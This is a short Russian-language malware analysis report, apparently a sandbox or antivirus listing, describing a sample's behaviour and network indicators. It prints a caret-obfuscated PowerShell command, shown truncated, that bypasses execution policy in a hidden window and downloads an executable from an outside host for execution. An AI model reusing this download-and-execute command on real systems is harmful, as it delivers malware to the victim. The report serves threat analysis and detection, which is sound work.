Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://118tk.com/topic/_derived/ahor8xfp/mcfxa6rd.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRShE^LL^.E^xE ^-EXeC^uTi^oNPoL^IcY B^yPaSs^ ^-NoPr^oFi^le -^W^in^do^w^styLE HId^de^n^ (new^-^O^bjE^c^t^ ^S^yStem.neT.w^E^Bc^l^iEnt^).D^ownloA^Dfi^le^(^'http://118tk.com/t...
Сетевая активность
Подключается к
- '11##k.com':80
- 'yy#####4.ak47csgo.net':118
TCP
Запросы HTTP GET
- http://11##k.com/topic/_derived/AHor8xfp/mCFXa6rD.exe
Другие
- 'yy#####4.ak47csgo.net':118
UDP
- DNS ASK 11##k.com
- DNS ASK yy#####4.ak47csgo.net
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "Po^W^eRShE^LL^.E^xE ^-EXeC^uTi^oNPoL^IcY B^yPaSs^ ^-NoPr^oFi^le -^W^in^do^w^styLE HId^de^n^ (new^-^O^bjE^c^t^ ^S^yStem.neT.w^E^Bc^l^iEnt^).D^ownloA^Dfi^le^(^'http://118tk.com/t... (со скрытым окном)
